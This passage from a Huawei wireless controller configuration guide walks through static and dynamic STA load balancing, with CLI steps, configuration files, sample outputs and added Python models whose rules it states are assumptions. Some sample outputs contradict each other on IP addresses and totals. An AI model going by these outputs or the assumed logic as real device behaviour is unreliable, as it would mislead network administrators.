------------------------------------------------------------
Total: 4

l When a new STA requests to connect to AP area_1, the AC uses a static load balancing
algorithm to redirect the STA to the AP with a light load based on the configured load
balancing group.
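How the three thresholds shown above (start threshold 15, gap threshold 25%, deny threshold 3) combine into an admission decision, as an added model that is not Huawei's code: the admission rule, the load-difference formula (distance to the least loaded radio as a percentage of the target radio's own load) and the client counts are assumptions; the group, radios, channels and thresholds are the ones from this example.

```python
"""Model of the session-based static load balancing thresholds used in this
example: start threshold 15, gap threshold 25% and the deny threshold of 3
shown by display sta-load-balance static-group.

Added illustration, not Huawei's implementation: the admission rule, the
load-difference formula and the client counts are assumptions chosen to
show how the three thresholds interact.
"""
from dataclasses import dataclass, field


@dataclass
class Radio:
    ap_name: str
    radio_id: int     # 0 = 2.4 GHz radio, 1 = 5 GHz radio on the AP6010DN-AGN
    band: str         # "2.4G" or "5G"
    channel: int
    clients: int = 0  # associated STAs, the "Client" column of the display output


@dataclass
class StaticGroup:
    name: str
    start_threshold: int = 10  # CLI default; this example sets 15
    gap_threshold: int = 20    # percent, CLI default; this example sets 25
    deny_threshold: int = 3    # value shown in the display output
    members: list = field(default_factory=list)
    denials: dict = field(default_factory=dict)  # STA MAC -> consecutive rejections


def validate_group(group):
    """Check the group against the configuration notes of this example:
    at most three APs, one frequency band, and no two radios on one channel."""
    problems = []
    if len({r.ap_name for r in group.members}) > 3:
        problems.append("more than three APs in group " + group.name)
    bands = {r.band for r in group.members}
    if len(bands) > 1:
        problems.append("mixed frequency bands %s in group %s"
                        % (sorted(bands), group.name))
    channels = [r.channel for r in group.members]
    if len(channels) != len(set(channels)):
        problems.append("radios share a channel in group " + group.name)
    return problems


def load_gap_percent(group, radio):
    """Assumed load difference: how far the target radio is above the least
    loaded radio in the group, in percent of the target radio's own load."""
    if radio.clients == 0:
        return 0
    lightest = min(r.clients for r in group.members)
    return (radio.clients - lightest) * 100 // radio.clients


def admit(group, radio, sta_mac):
    """Decide whether the AC lets sta_mac associate with radio; returns
    (admitted, reason).

    Assumed rule: balancing starts once the target radio holds
    start_threshold STAs; the STA is then rejected while the load gap exceeds
    gap_threshold, but at most deny_threshold times in a row, so a client
    that keeps retrying the same radio is not locked out for good.
    """
    if radio not in group.members:
        return True, "radio is not a member of the load balancing group"
    if radio.clients < group.start_threshold:
        return True, "below start threshold, load balancing not active"
    gap = load_gap_percent(group, radio)
    if gap <= group.gap_threshold:
        group.denials.pop(sta_mac, None)
        return True, "load gap %d%% within threshold" % gap
    count = group.denials.get(sta_mac, 0)
    if count >= group.deny_threshold:
        group.denials.pop(sta_mac, None)
        return True, "deny threshold reached, admitted despite %d%% gap" % gap
    group.denials[sta_mac] = count + 1
    return False, "rejected %d of %d times, gap %d%% exceeds %d%%" % (
        count + 1, group.deny_threshold, gap, group.gap_threshold)


def example_group(clients_area_1, clients_area_2):
    """Group wlan-static of this example: radio 0 (2.4 GHz) of area_1 on
    channel 6 and of area_2 on channel 1. Client counts are constructed."""
    r1 = Radio("area_1", 0, "2.4G", 6, clients_area_1)
    r2 = Radio("area_2", 0, "2.4G", 1, clients_area_2)
    group = StaticGroup("wlan-static", start_threshold=15, gap_threshold=25,
                        members=[r1, r2])
    return group, r1, r2


if __name__ == "__main__":
    group, area_1, area_2 = example_group(20, 12)
    print("group check:", validate_group(group) or "ok")
    # Constructed STA MAC (taken from the display station output above). The
    # AC rejects it towards the loaded area_1 radio three times; a real client
    # would normally roam to area_2 before the deny threshold lets it in.
    for attempt in range(1, 5):
        print(attempt, admit(group, area_1, "e019-1dc7-1e08"))
```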

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface gigabitethernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface gigabitethernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface gigabitethernet0/0/3
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
return

l Configuration file of the Router


#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
gateway-list 10.23.101.1
network 10.23.101.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 10.23.101.0 255.255.255.0 10.23.102.2
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 102
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.23.102.1
#
interface Vlanif102
ip address 10.23.102.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 0.0.0.0 0.0.0.0 10.23.102.1
#
capwap source interface vlanif100
#
wlan
security-profile name wlan-security
security wpa2 psk pass-phrase %^%#m"tz0f>~7.[`^6RWdzwCy16hJj/Mc!,}s`X*B]}A%^%# aes
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
sta-load-balance static-group name wlan-static
gap-threshold 25
member ap-name area_1 radio 0
member ap-name area_1 radio 1
member ap-name area_2 radio 0
member ap-name area_2 radio 1
start-threshold 15
regulatory-domain-profile name domain1
ap-group name ap-group1
regulatory-domain-profile domain1
vap-profile wlan-vap wlan 1
radio 0
vap-profile wlan-vap wlan 1
radio 1
vap-profile wlan-vap wlan 1
ap-id 0 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235554710CB000042
ap-name area_1
ap-group ap-group1
ap-id 1 type-id 21 ap-mac dcd2-fc04-b500 ap-sn 210235554710CB000078
ap-name area_2
ap-group ap-group1
#
return

16.9.3 Example for Configuring Dynamic Load Balancing


Dynamic Load Balancing Overview
Load balancing can evenly distribute AP traffic loads to ensure sufficient bandwidth for each
STA. When a STA joins the network, the AC adds the APs that report the STA to a load
balancing group, and then uses a load balancing algorithm to determine whether to allow
access from the STA.
Dynamic load balancing applies to high-density wireless environments, such as stadiums and
stations.
Static load balancing supports a limited number of group members, and all members must be
manually added to the group and work on the same frequency band. Dynamic load balancing
overcomes these limitations and can better ensure bandwidth for each STA.

Configuration Notes
l In this example, the security policy is WPA2-PSK-AES. To ensure network security,
choose an appropriate security policy according to your network configurations.
l In the service data forwarding mode, the management VLAN and service VLAN cannot
be the same. If you set the forwarding mode to direct forwarding, you are not advised to
configure the management VLAN and service VLAN to be the same.
l If direct forwarding is used, configure port isolation on the interfaces that directly connect to
APs. If port isolation is not configured, a large number of broadcast packets will be transmitted
in the VLANs, or WLAN users on different APs will be able to communicate directly at Layer 2.
l Configure the management VLAN and service VLAN:
– In tunnel forwarding mode, service packets are encapsulated in a CAPWAP tunnel,
and then forwarded to the AC. The AC then forwards the packets to the upper-layer
network or APs. Therefore, service packets and management packets can be
normally forwarded as long as the network between the AC and APs is added to the
management VLAN and service VLAN and the network between the AC and
upper-layer network is added to the service VLAN.
– In direct forwarding mode, service packets are not encapsulated into a CAPWAP
tunnel, but are directly forwarded to the upper-layer network or APs. Therefore,
service packets and management packets can be normally forwarded only when the
network between the AC and APs is added to the management VLAN and the
network between APs and upper-layer network is added to the service VLAN.
l Radio traffic statistics packets are sent and received together with Echo packets. In this
example, traffic-based dynamic load balancing is used. You are advised to set the
CAPWAP heartbeat detection interval to 30s to 60s so that the radio traffic statistics can
be updated in a timely manner.
l No ACK mechanism is provided for multicast packet transmission on air interfaces. In
addition, wireless links are unstable. To ensure stable transmission of multicast packets,
they are usually sent at low rates. If a large number of such multicast packets are sent
from the network side, the air interfaces may be congested. You are advised to configure
multicast packet suppression to reduce impact of a large number of low-rate multicast
packets on the wireless network. Exercise caution when configuring the rate limit;
otherwise, the multicast services may be affected.
– In direct forwarding mode, you are advised to configure multicast packet
suppression on switch interfaces connected to APs.
– In tunnel forwarding mode, you are advised to configure multicast packet
suppression in traffic profiles of the AC.
For details on how to configure traffic suppression, see "How Do I Configure Multicast
Packet Suppression to Reduce Impact of a Large Number of Low-Rate Multicast Packets
on the Wireless Network?" in Configuration Guide — WLAN AC > WLAN QoS
Configuration.
l The following table lists applicable products and versions.

Table 16-23 Applicable products and versions

Software Version: V200R009C00
Product Model: S12700
AP Model and Version:
V200R007C00: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
AP4030DN, AP4130DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12, R230D, R240D,
AP6050DN, AP6150DN, AP7050DE, AP7050DN-E, AP4030TN, AP4050DN-E, AP4050DN-HD
V200R006C20: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
AP4030DN, AP4130DN, AP3030DN, AP2030DN, AP9131DN, AP9132DN, AD9430DN-24, AD9430DN-12,
R230D, R240D
V200R006C10: AP6010SN-GN, AP6010DN-AGN, AP6310SN-GN, AP6510DN-AGN, AP6610DN-AGN,
AP7110SN-GN, AP7110DN-AGN, AP5010SN-GN, AP5010DN-AGN, AP3010DN-AGN, AP6510DN-AGN-US,
AP6610DN-AGN-US, AP5030DN, AP5130DN, AP7030DE, AP2010DN, AP8130DN, AP8030DN, AP9330DN,
AP4030DN, AP4130DN, AP3030DN, AP2030DN

Networking Requirements
As shown in Figure 16-10, the AC connects to the upper-layer network and manages the APs
through the access and aggregation switches.
AP area_1 and AP area_2 are deployed in the same conference room. The customer requires
that data traffic be balanced on AP radios to prevent one AP radio from being heavily loaded.

Figure 16-10 Networking diagram for configuring dynamic load balancing

[Figure: Internet - Router (GE2/0/0, VLAN 102) - AC (GE1/0/2 in VLAN 102 towards the Router,
GE1/0/1 in VLAN 100 towards SwitchA) - SwitchA (GE0/0/2 in VLAN 100 towards the AC; GE0/0/1 and
GE0/0/3 in VLAN 100 towards the APs) - AP area_1 and AP area_2, each serving STAs.
Management VLAN: VLAN 100; service VLAN: VLAN 101.]

Configuration Roadmap

Table 16-24 Data required for completing the configuration

DHCP server: The AC functions as the DHCP server to assign IP addresses to the APs and STAs.
IP address pool for the APs: 10.23.100.2-10.23.100.254/24
IP address pool for the STAs: 10.23.101.2-10.23.101.254/24
IP address of the AC's source interface: VLANIF 100: 10.23.100.1/24
AP group:
l Name: ap-group1
l Referenced profiles: VAP profile wlan-vap, regulatory domain profile domain1, 5G radio
profile radio5g, and 2G radio profile radio2g
Regulatory domain profile:
l Name: domain1
l Country code: CN
SSID profile:
l Name: wlan-ssid
l SSID name: wlan-net
Security profile:
l Name: wlan-security
l Security policy: WPA2+PSK+AES
l Password: a1234567
VAP profile:
l Name: wlan-vap
l Forwarding mode: tunnel forwarding
l Service VLAN: VLANs in the VLAN pool
l Referenced profiles: SSID profile wlan-ssid and security profile wlan-security
5G radio profile:
l Name: radio5g
l Referenced profile: RRM profile loadbalance-dynamic
2G radio profile:
l Name: radio2g
l Referenced profile: RRM profile loadbalance-dynamic
RRM profile:
l Name: loadbalance-dynamic
l Start threshold for dynamic load balancing: 15
l Load difference threshold for dynamic load balancing: 25%

The configuration roadmap is as follows:


1. Configure the APs, AC, and upper-layer devices to communicate with each other.
2. Configure the AC as a DHCP server to assign IP addresses to the APs and STAs.
3. Configure a VLAN pool for service VLANs.
4. Configure the APs to go online.
a. Create an AP group and add APs that require the same configuration to the group
for unified configuration.
b. Configure AC system parameters, including the country code and source interface
used by the AC to communicate with the APs.
c. Configure the AP authentication mode and import the APs offline to allow the APs
to go online.
5. Configure WLAN service parameters for STAs to access the WLAN.
6. Configure dynamic load balancing to prevent one AP from being heavily loaded.

NOTE
During AP deployment, you can manually specify the working channels of the APs according to network
planning or configure the radio calibration function to enable the APs to automatically select the optimal
channels. This example configures the radio calibration function.

Procedure
Step 1 Set the NAC mode to unified mode on the AC (default setting). Configure SwitchA and the
AC so that the AP and AC can transmit CAPWAP packets.
# Add GE0/0/1 and GE0/0/3, which connect SwitchA to the APs, and GE0/0/2, which connects
SwitchA to the AC, to management VLAN 100.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100
[SwitchA] interface gigabitethernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitethernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk
[SwitchA-GigabitEthernet0/0/2] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/2] quit
[SwitchA] interface gigabitethernet 0/0/3
[SwitchA-GigabitEthernet0/0/3] port link-type trunk
[SwitchA-GigabitEthernet0/0/3] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/3] port trunk allow-pass vlan 100
[SwitchA-GigabitEthernet0/0/3] quit

# Add GE1/0/1 that connects the AC to SwitchA to VLAN 100.


<HUAWEI> system-view
[HUAWEI] sysname AC
[AC] vlan batch 100
[AC] interface gigabitethernet 1/0/1
[AC-GigabitEthernet1/0/1] port link-type trunk
[AC-GigabitEthernet1/0/1] port trunk allow-pass vlan 100
[AC-GigabitEthernet1/0/1] quit

Step 2 Configure the AC to communicate with the upstream device.


# Configure VLAN 101 (service VLAN) and VLANIF 102.
[AC] vlan batch 101 102
[AC] interface vlanif 101
[AC-Vlanif101] ip address 10.23.101.1 24
[AC-Vlanif101] quit
[AC] interface vlanif 102
[AC-Vlanif102] ip address 10.23.102.2 24
[AC-Vlanif102] quit

# Configure a default route on the AC.


[AC] ip route-static 0.0.0.0 0.0.0.0 10.23.102.1 //Configure a default route
destined for Router.

# Add GE1/0/2 that connects the AC to the Router to VLAN 102.


[AC] interface gigabitethernet 1/0/2
[AC-GigabitEthernet1/0/2] port link-type trunk
[AC-GigabitEthernet1/0/2] port trunk allow-pass vlan 102
[AC-GigabitEthernet1/0/2] quit

Step 3 Configure the AC to assign an IP address to the AP and the Router to assign IP addresses to
STAs.
# Configure the AC to assign an IP address to the AP from an interface IP address pool.
[AC] dhcp enable
[AC] interface vlanif 100
[AC-Vlanif100] ip address 10.23.100.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit

# Configure the AC as the DHCP relay agent and enable user entry detection on the AC.
[AC] interface vlanif 101
[AC-Vlanif101] dhcp select relay //Configure the DHCP relay function.
[AC-Vlanif101] dhcp relay server-ip 10.23.102.1 //Set the DHCP server address for DHCP relay to 10.23.102.1, which resides on Router.
[AC-Vlanif101] quit

# Configure the Router as a DHCP server to allocate IP addresses to STAs.


<Huawei> system-view
[Huawei] sysname Router
[Router] dhcp enable
[Router] ip pool sta //Configure the address pool to assign IP addresses to STAs.
[Router-ip-pool-sta] gateway-list 10.23.101.1
[Router-ip-pool-sta] network 10.23.101.0 mask 24
[Router-ip-pool-sta] quit
[Router] vlan batch 102
[Router] interface vlanif 102
[Router-Vlanif102] ip address 10.23.102.1 24
[Router-Vlanif102] dhcp select global //Configure a global address pool.
[Router-Vlanif102] quit
[Router] interface gigabitethernet 2/0/0
[Router-GigabitEthernet2/0/0] port link-type trunk
[Router-GigabitEthernet2/0/0] port trunk allow-pass vlan 102
[Router-GigabitEthernet2/0/0] quit
[Router] ip route-static 10.23.101.0 24 10.23.102.2 //Configure a route on the Router destined for the network segment 10.23.101.0/24.

Step 4 Configure the AP to go online.


# Create an AP group and add the AP to the AP group.
[AC] wlan
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] quit

# Create a regulatory domain profile, configure the AC country code in the profile, and apply
the profile to the AP group.
[AC-wlan-view] regulatory-domain-profile name domain1
[AC-wlan-regulate-domain-domain1] country-code cn
[AC-wlan-regulate-domain-domain1] quit
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] regulatory-domain-profile domain1
Warning: Modifying the country code will clear channel, power and antenna gain configurations of the radio and reset the AP. Continue?[Y/N]:y
[AC-wlan-ap-group-ap-group1] quit
[AC-wlan-view] quit

# Configure the AC's source interface.


[AC] capwap source interface vlanif 100


# Import the AP offline on the AC and add the AP to AP group ap-group1. Assume that the
AP's MAC address is 60de-4476-e360. Configure a name for the AP based on the AP's
deployment location, so that you can know where the AP is deployed from its name. For
example, name the AP area_1 if it is deployed in Area 1.
NOTE

The default AP authentication mode is MAC address authentication. If the default settings are retained, you
do not need to run the ap auth-mode mac-auth command.
In this example, the AP6010DN-AGN is used and has two radios: radio 0 (2.4 GHz radio) and radio 1 (5 GHz
radio).
[AC] wlan
[AC-wlan-view] ap auth-mode mac-auth
[AC-wlan-view] ap-id 0 ap-mac 60de-4476-e360
[AC-wlan-ap-0] ap-name area_1
[AC-wlan-ap-0] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-0] quit
[AC-wlan-view] ap-id 1 ap-mac dcd2-fc04-b500
[AC-wlan-ap-1] ap-name area_2
[AC-wlan-ap-1] ap-group ap-group1
Warning: This operation may cause AP reset. If the country code changes, it will clear channel, power and antenna gain configurations of the radio, Whether to continue? [Y/N]:y
[AC-wlan-ap-1] quit

# After the AP is powered on, run the display ap all command to check the AP state. If the
State field is displayed as nor, the AP goes online normally.
[AC-wlan-view] display ap all
Total AP information:
nor : normal [2]
---------------------------------------------------------------------------------------
ID MAC            Name   Group     IP            Type         State STA Uptime
---------------------------------------------------------------------------------------
0  60de-4476-e360 area_1 ap-group1 10.23.101.253 AP6010DN-AGN nor   0   5M:2S
1  dcd2-fc04-b500 area_2 ap-group1 10.23.101.254 AP6010DN-AGN nor   0   5M:4S
---------------------------------------------------------------------------------------
Total: 2

Step 5 Configure WLAN service parameters.


# Create security profile wlan-security and set the security policy in the profile.
NOTE

In this example, the security policy is set to WPA2+PSK+AES and password to a1234567. In actual
situations, the security policy must be configured according to service requirements.
[AC-wlan-view] security-profile name wlan-security
[AC-wlan-sec-prof-wlan-security] security wpa2 psk pass-phrase a1234567 aes //Configure security policy WPA2+PSK+AES.
[AC-wlan-sec-prof-wlan-security] quit

# Create SSID profile wlan-ssid and set the SSID name to wlan-net.
[AC-wlan-view] ssid-profile name wlan-ssid
[AC-wlan-ssid-prof-wlan-ssid] ssid wlan-net //Set the SSID to wlan-net.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-ssid-prof-wlan-ssid] quit


# Create VAP profile wlan-vap, set the data forwarding mode and service VLAN, and apply
the security profile and SSID profile to the VAP profile.
[AC-wlan-view] vap-profile name wlan-vap
[AC-wlan-vap-prof-wlan-vap] forward-mode tunnel //Set the service forwarding mode to tunnel.
Warning: This action may cause service interruption. Continue?[Y/N]y
[AC-wlan-vap-prof-wlan-vap] service-vlan vlan-id 101 //Set the VLAN ID to 101. By default, the VLAN ID is 1.
[AC-wlan-vap-prof-wlan-vap] security-profile wlan-security
[AC-wlan-vap-prof-wlan-vap] ssid-profile wlan-ssid
[AC-wlan-vap-prof-wlan-vap] quit

# Bind VAP profile wlan-vap to the AP group and apply the profile to radio 0 and radio 1 of
the AP.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 0
[AC-wlan-ap-group-ap-group1] vap-profile wlan-vap wlan 1 radio 1
[AC-wlan-ap-group-ap-group1] quit

Step 6 Configure dynamic load balancing.


# Create the RRM profile loadbalance-dynamic and enable dynamic load balancing in the
RRM profile loadbalance-dynamic and set the start threshold for dynamic load balancing to
15 and load difference threshold to 25%.
[AC-wlan-view] rrm-profile name loadbalance-dynamic
[AC-wlan-rrm-prof-loadbalance-dynamic] sta-load-balance dynamic enable
[AC-wlan-rrm-prof-loadbalance-dynamic] sta-load-balance dynamic start-threshold 15
[AC-wlan-rrm-prof-loadbalance-dynamic] sta-load-balance dynamic gap-threshold 25
[AC-wlan-rrm-prof-loadbalance-dynamic] quit

# Create the 2G radio profile radio2g and bind the RRM profile loadbalance-dynamic to the
2G radio profile.
[AC-wlan-view] radio-2g-profile name radio2g
[AC-wlan-radio-2g-prof-radio2g] rrm-profile loadbalance-dynamic
[AC-wlan-radio-2g-prof-radio2g] quit

# Create the 5G radio profile radio5g and bind the RRM profile loadbalance-dynamic to the
5G radio profile.
[AC-wlan-view] radio-5g-profile name radio5g
[AC-wlan-radio-5g-prof-radio5g] rrm-profile loadbalance-dynamic
[AC-wlan-radio-5g-prof-radio5g] quit

# Bind the 5G radio profile radio5g and 2G radio profile radio2g to the AP group ap-
group1.
[AC-wlan-view] ap-group name ap-group1
[AC-wlan-ap-group-ap-group1] radio-5g-profile radio5g
[AC-wlan-ap-group-ap-group1] radio-2g-profile radio2g
[AC-wlan-ap-group-ap-group1] quit

Step 7 Commit the configuration.


[AC-wlan-view] commit all
Warning: Committing configuration may cause service interruption, continue?[Y/N]:y

Step 8 Verify the configuration.


l Connect STAs to the WLAN with SSID wlan-net and enter the password a1234567.
Run the display station ssid wlan-net command on the AC. The command output
shows that the STAs are connected to the WLAN wlan-net.
[AC-wlan-view] display station ssid wlan-net
Rf/WLAN: Radio ID/WLAN ID


Rx/Tx: link receive rate/link transmit rate(Mbps)
-------------------------------------------------------------------------------------
STA MAC        AP ID Ap name Rf/WLAN Band Type Rx/Tx RSSI VLAN IP address
-------------------------------------------------------------------------------------
e019-1dc7-1e08 0     area_1  0/1     2.4G 11n  65/38 -29  101  10.23.101.253
b878-2eb4-2689 1     area_2  0/1     2.4G 11n  78/43 -33  101  10.23.101.254
-------------------------------------------------------------------------------------
Total: 2 2.4G: 2 5G: 0

l Run the display rrm-profile name loadbalance-dynamic command on the AC to check
the dynamic load balancing configuration.
[AC-wlan-view] display rrm-profile name loadbalance-dynamic
------------------------------------------------------------
Auto channel select : enable
Auto transmit power select : enable
PER threshold for trigger channel/power select(%) : 60
Airtime fairness schedule : disable
Dynamic adjust EDCA parameter : disable
UAC check client's SNR : disable
UAC client's SNR threshold(dB) : 20
UAC check client number : disable
UAC client number access threshold : 64
UAC client number roam threshold : 64
UAC check channel utilization : disable
UAC channel utilization access threshold : 80
UAC channel utilization roam threshold : 80
UAC hide SSID : disable
Band steer deny threshold : 2
Band balance start threshold : 10
Band balance gap threshold(%) : 20
Client's band expire based on continuous probe counts : 35
Station load balance : enable
Station load balance start threshold : 15
Station load balance gap threshold(%) : 25
Station load balance deny threshold : 3
Smart-roam : disable
Smart-roam check SNR : enable
Smart-roam standing SNR threshold(dB) : 20
Smart-roam SNR quick-kickoff-threshold(dB) : 15
Smart-roam check rate : disable
AMC policy : auto-balance
Smart-roam rate threshold(%) : 20
Smart-roam rate quick-kickoff-threshold(%) : 20
Smart-roam high level SNR margin(dB) : 15
Smart-roam low level SNR margin(dB) : 6
Smart-roam SNR check interval(s) : 3
Smart-roam unable roam client expire time(m) : 120
------------------------------------------------------------

l Run the display station load-balance sta-mac e019-1dc7-1e08 command on the AC to
check AP radios participating in dynamic load balancing.
[AC-wlan-view] display station load-balance sta-mac e019-1dc7-1e08
Station load balance status: balance
------------------------------------------------------------------------------
AP name Radio ID
------------------------------------------------------------------------------
area_1 1
area_1 0
area_2 1
area_2 0
------------------------------------------------------------------------------
Total: 2


l When a new STA requests to connect to AP area_1, the AC uses a dynamic load
balancing algorithm to redirect the STA to the AP with a light load according to the
information reported by APs.

----End
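The load balancing decision described in the last bullet, modelled as an added example (not Huawei's implementation): the thresholds are the ones from rrm-profile loadbalance-dynamic above, while the way the load gap is measured and the retry behaviour are assumptions.

```python
"""Model of the dynamic STA load balancing decision configured in Step 6.

Added illustration, not Huawei's implementation. The thresholds are the ones
from rrm-profile loadbalance-dynamic (start 15, gap 25%, deny 3 as shown by
display rrm-profile); how the AC measures the load gap is an assumption.
"""
from dataclasses import dataclass


@dataclass
class RadioLoad:
    ap_name: str
    radio_id: int
    sta_count: int  # STAs currently associated, as reported by the AP


@dataclass
class LoadBalancePolicy:
    start_threshold: int = 15    # sta-load-balance dynamic start-threshold
    gap_threshold_pct: int = 25  # sta-load-balance dynamic gap-threshold
    deny_threshold: int = 3      # "Station load balance deny threshold"


def load_gap_pct(candidate, group):
    """Assumed gap metric: how much heavier the candidate radio is than the
    lightest radio in its balancing group, relative to the candidate's load."""
    if candidate.sta_count == 0:
        return 0.0
    lightest = min(r.sta_count for r in group)
    return 100.0 * (candidate.sta_count - lightest) / candidate.sta_count


def should_defer(candidate, group, policy, denies_so_far):
    """True if the radio should reject this association so the STA retries on
    a lighter radio. Balancing starts only once the radio holds at least
    start_threshold STAs, and a STA is rejected at most deny_threshold times,
    so a STA that can only hear the busy radios still gets service."""
    if candidate.sta_count < policy.start_threshold:
        return False
    if denies_so_far >= policy.deny_threshold:
        return False
    return load_gap_pct(candidate, group) > policy.gap_threshold_pct


def simulate_association(preferred, group, policy):
    """Try the STA's candidate radios in its order of preference (for example
    by RSSI) and return (radio that accepted it, rejections it saw first)."""
    denies = 0
    while True:
        for radio in preferred:
            if should_defer(radio, group, policy, denies):
                denies += 1
                continue
            return radio, denies


# Constructed load report for the two APs of this example, radio 0 and 1 each.
GROUP = [RadioLoad("area_1", 0, 20), RadioLoad("area_1", 1, 12),
         RadioLoad("area_2", 0, 8), RadioLoad("area_2", 1, 4)]

if __name__ == "__main__":
    policy = LoadBalancePolicy()
    # A STA in Area 1 prefers area_1's radios; radio 0 is 80% heavier than the
    # lightest radio, so it defers and the STA lands on area_1 radio 1.
    radio, denies = simulate_association(GROUP[:2], GROUP, policy)
    print(f"accepted by {radio.ap_name} radio {radio.radio_id} after {denies} rejection(s)")
```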

Configuration Files
l Configuration file of the SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface gigabitethernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface gigabitethernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface gigabitethernet0/0/3
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the Router


#
sysname Router
#
vlan batch 102
#
dhcp enable
#
ip pool sta
gateway-list 10.23.101.1
network 10.23.101.0 mask 255.255.255.0
#
interface Vlanif102
ip address 10.23.102.1 255.255.255.0
dhcp select global
#
interface GigabitEthernet2/0/0
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 10.23.101.0 255.255.255.0 10.23.102.2
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 102
#
dhcp enable
#
interface Vlanif100
ip address 10.23.100.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 10.23.101.1 255.255.255.0
dhcp select relay
dhcp relay server-ip 10.23.102.1
#
interface Vlanif102
ip address 10.23.102.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 102
#
ip route-static 0.0.0.0 0.0.0.0 10.23.102.1
#
capwap source interface vlanif100
#
wlan
security-profile name wlan-security
security wpa2 psk pass-phrase %^%#m"tz0f>~7.[`^6RWdzwCy16hJj/Mc!,}s`X*B]}A%^%# aes
ssid-profile name wlan-ssid
ssid wlan-net
vap-profile name wlan-vap
forward-mode tunnel
service-vlan vlan-id 101
ssid-profile wlan-ssid
security-profile wlan-security
regulatory-domain-profile name domain1
rrm-profile name loadbalance-dynamic
sta-load-balance dynamic enable
sta-load-balance dynamic start-threshold 15
sta-load-balance dynamic gap-threshold 25
radio-2g-profile name radio2g
rrm-profile loadbalance-dynamic
radio-5g-profile name radio5g
rrm-profile loadbalance-dynamic
ap-group name ap-group1
regulatory-domain-profile domain1
radio 0
radio-2g-profile radio2g
radio-5g-profile radio5g
vap-profile wlan-vap wlan 1
radio 1
radio-5g-profile radio5g
vap-profile wlan-vap wlan 1
ap-id 0 type-id 19 ap-mac 60de-4476-e360 ap-sn 210235554710CB000042
ap-name area_1
ap-group ap-group1
ap-id 1 type-id 21 ap-mac dcd2-fc04-b500 ap-sn 210235554710CB000078
ap-name area_2
ap-group ap-group1
#
return

16.10 Configuring WLAN Roaming


16.10.1 Example for Configuring Intra-AC Roaming

WLAN Roaming Overview


WLAN roaming allows an STA to move from the coverage area of an AP to that of another
AP with nonstop service transmission. Roaming between APs in the same service VLAN
allows an STA to move between two APs that connect to the same AC and belong to the same
service VLAN without service interruption.
Roaming between APs in the same service VLAN is classified into fast roaming and non-fast
roaming. Non-fast roaming technology is used when an STA uses a non-WPA2-802.1x
security policy. If an STA uses WPA2-802.1x but does not support fast roaming, the STA still
needs to complete 802.1x authentication before roaming between two APs. When the user
uses the WPA2-802.1x security policy and supports fast roaming, the user does not need to
perform 802.1x authentication again during roaming and only needs to perform key
negotiation. In this case, fast roaming reduces the roaming delay and improves the WLAN
service experience.

Configuration Notes
l The APs on which WLAN roaming is implemented must use the same SSID and security
profiles, and the security profiles must have the same configurations.
